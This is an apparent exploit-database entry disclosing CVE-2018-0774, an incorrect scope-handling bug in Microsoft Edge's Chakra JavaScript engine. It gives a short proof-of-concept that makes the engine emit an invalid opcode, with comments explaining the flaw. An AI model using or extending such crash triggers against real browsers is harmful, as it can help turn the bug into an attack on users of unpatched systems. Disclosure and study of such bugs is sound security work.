Microsoft Edge Chakra - Incorrect Scope Handling



EKU-ID: 7273 CVE: 2018-0774 OSVDB-ID:
Author: Google Security Research Published: 2018-01-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


// PoC:
 
(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {
 
    }
})();
 
// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.